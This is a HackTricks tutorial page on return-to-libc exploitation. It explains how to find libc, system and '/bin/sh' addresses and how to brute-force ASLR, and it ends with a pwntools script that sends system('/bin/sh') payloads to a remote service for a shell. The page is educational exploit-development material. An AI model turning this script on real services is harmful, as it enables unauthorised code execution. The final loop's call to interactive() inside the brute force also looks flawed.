hacktricks/exploiting/linux-exploiting-basic-esp/ret2lib.md

<details>

<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>

**If you have found a vulnerable binary and you think you can exploit it using Ret2Lib, here you can find some basic steps you can follow.**

# If you are **inside** the **host**

## You can find the **libc address**

```bash
ldd /path/to/executable | grep libc.so.6  # Address (if ASLR is on, this changes every run)
```

If you want to check whether ASLR changes the libc address, you can do the following and compare the addresses printed on each run:

```bash
for i in `seq 0 20`; do ldd <executable> | grep libc; done
```

## Getting the offset of the system function

The offset of `system` is its position inside libc relative to the library's load base. It depends only on the libc build, not on where ASLR places the library, so it can be read from the libc file on disk.

First identify which libc the target binary loads (`ldd` on the binary, as above). Then list that library's symbols with `readelf -s` (or `objdump -T`) and filter for `system` (the pattern `\<system\>` matches the whole word); the symbol value printed is the offset.

At run time the address of `system` is the libc base address (from `ldd` or `/proc/<PID>/maps`) plus this offset. This is the value used in return-to-libc payloads.

```bash
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
```

## Getting the offset of "/bin/sh"

To get the offset of the string "/bin/sh" inside libc you can use a tool such as `pwntools` or `ROPgadget`. These tools let you find the offsets of specific strings in the libraries loaded by the target program.

Here is an example that uses the `pwntools` library to get the offset of "/bin/sh":

```python
from pwn import *

# Open libc itself (not the target binary): an address found inside the
# unloaded library file is already the offset relative to the libc base.
libc = ELF('/lib/i386-linux-gnu/libc.so.6')
bin_sh_offset = next(libc.search(b'/bin/sh'))

print(f'Offset of "/bin/sh": {hex(bin_sh_offset)}')
```

After running this code you get the offset of "/bin/sh" in hexadecimal. The same value can be obtained with `strings`:

```bash
strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
```

## /proc/\<PID>/maps

If the process creates **children** every time you interact with it (network server), try to **read** that file (you will probably need root access).

There you can find **exactly where libc is loaded** inside the process and **where it will be loaded** for every child of the process.

![](<../../.gitbook/assets/image (95).png>)

In this case it is loaded at **0xb75dc000** (this will be the libc base address).

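As an added example (not code from the original page), the following Python parses `/proc/<PID>/maps` output to derive the libc base described above, and compares several captured snapshots to answer the earlier question of whether ASLR moves libc between runs. The maps lines are constructed for illustration; only the libc path and the base 0xb75dc000 come from this page.

```python
import re

# Constructed /proc/<PID>/maps snapshot (32-bit layout; values are made up).
SAMPLE_MAPS = """\
08048000-08049000 r-xp 00000000 08:01 131090     /home/user/vuln
08049000-0804a000 rw-p 00000000 08:01 131090     /home/user/vuln
b75dc000-b7737000 r-xp 00000000 08:01 393410     /lib/i386-linux-gnu/libc.so.6
b7737000-b7738000 ---p 0015b000 08:01 393410     /lib/i386-linux-gnu/libc.so.6
b7738000-b773a000 r--p 0015b000 08:01 393410     /lib/i386-linux-gnu/libc.so.6
b773a000-b773b000 rw-p 0015d000 08:01 393410     /lib/i386-linux-gnu/libc.so.6
b7760000-b7780000 r-xp 00000000 08:01 393382     /lib/i386-linux-gnu/ld-2.19.so
bfd5e000-bfd7f000 rw-p 00000000 00:00 0          [stack]
"""

# start-end perms offset dev inode [path]
MAPS_LINE = re.compile(
    r"^([0-9a-f]+)-([0-9a-f]+)\s+(\S{4})\s+([0-9a-f]+)\s+\S+\s+\d+\s*(.*)$"
)

def parse_maps(text):
    """Yield (start, end, perms, file_offset, path) for every mapping line."""
    for line in text.splitlines():
        m = MAPS_LINE.match(line.strip())
        if not m:
            continue  # skip blank or malformed lines
        start, end, perms, off, path = m.groups()
        yield int(start, 16), int(end, 16), perms, int(off, 16), path

def libc_base(maps_text):
    """Load base of libc: the lowest libc mapping whose file offset is 0.
    Returns None when libc is not mapped (static binary, or not loaded yet)."""
    candidates = [
        start for start, _end, _perms, off, path in parse_maps(maps_text)
        if re.search(r"/libc(-[\d.]+)?\.so", path) and off == 0
    ]
    return min(candidates) if candidates else None

def aslr_moves_libc(snapshots):
    """Given maps text from several runs of the same program, report whether the
    libc base changed (ASLR randomising shared libraries) and the bases seen."""
    bases = {libc_base(s) for s in snapshots}
    bases.discard(None)
    return len(bases) > 1, sorted(bases)

if __name__ == "__main__":
    print(f"libc base: {libc_base(SAMPLE_MAPS):#x}")
    second_run = SAMPLE_MAPS.replace("b75dc000-b7737000", "b7602000-b775d000")
    moved, seen = aslr_moves_libc([SAMPLE_MAPS, second_run])
    print("ASLR moved libc:", moved, [hex(b) for b in seen])
```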
## Using gdb-peda

Get the address of the **system** function, the **exit** function and the string **"/bin/sh"** using gdb-peda:

```
p system
p exit
find "/bin/sh"
```

# Bypassing ASLR

You can try to brute force the libc base address.

```python
for off in range(0xb7000000, 0xb8000000, 0x1000):  # candidate page-aligned libc bases
    ...  # build and send the payload using this base (see the code below)
```

# Code

```python
from pwn import *

c = remote('192.168.85.181', 20002)
c.recvline()  # Banner

# Brute force the libc base: libc offsets are fixed, only the base moves.
for off in range(0xb7000000, 0xb8000000, 0x1000):
    p = b""
    p += p32(off + 0x0003cb20)  # system
    p += b"CCCC"                # GARBAGE (fake return address for system)
    p += p32(off + 0x001388da)  # /bin/sh
    payload = b'A' * 0x20010 + p  # padding up to the saved return address
    c.send(payload)
    c.interactive()  # ?
```
